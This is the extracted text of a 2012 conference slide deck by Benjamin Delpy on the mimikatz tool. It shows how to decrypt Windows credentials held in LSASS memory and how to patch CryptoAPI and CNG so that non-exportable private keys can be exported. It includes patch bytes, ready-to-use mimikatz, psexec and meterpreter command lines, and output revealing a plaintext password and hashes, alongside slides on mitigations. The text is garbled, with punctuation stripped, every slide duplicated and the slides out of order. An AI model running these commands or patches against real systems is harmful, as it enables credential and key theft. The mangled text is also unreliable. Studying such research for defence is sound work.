mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32 32
LsaUnprotectMemory
mimikatz sekurlsa LsaEncryptMemory NT5
mimikatz sekurlsa LsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKey BYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
lsasrv
lsasrv
copyhellip
mimikatz sekurlsa LsaEncryptMemory NT6
mimikatz sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34 34
InitializationVector BYTE[16]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD size DWORD tag DWORD type DWORD unk0 DWORD unk1 DWORD unk2 DWORD unk3 PVOID unk4 BYTE data etc KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv
lsasrv
typedef struct _KIWI_BCRYPT_KEY DWORD size DWORD type PVOID unk0 PKIWI_BCRYPT_KEY_DATA cle PVOID unk1 KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz sekurlsa mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26 26
Me yes
mimikatz sekurlsa kerberos mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27 27
lsasrvLsaProtectMemory kerberosKerbHideKey kerberosKerbCreatePrimaryCredentials kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory kerberosKerbHidePassword kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory wdigestSpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6) workflow
mimikatz sekurlsa kerberos (nt6) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL DWORD unk0 PVOID unk1 PVOID unk2 PVOID unk3 ifdef _M_X64 BYTE unk4[32] elif defined _M_IX86 BYTE unk4[20] endif LUID LocallyUniqueIdentifier ifdef _M_X64 BYTE unk5[44] elif defined _M_IX86 BYTE unk5[36] endif LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5) workflow
mimikatz sekurlsa kerberos (nt5) workflow
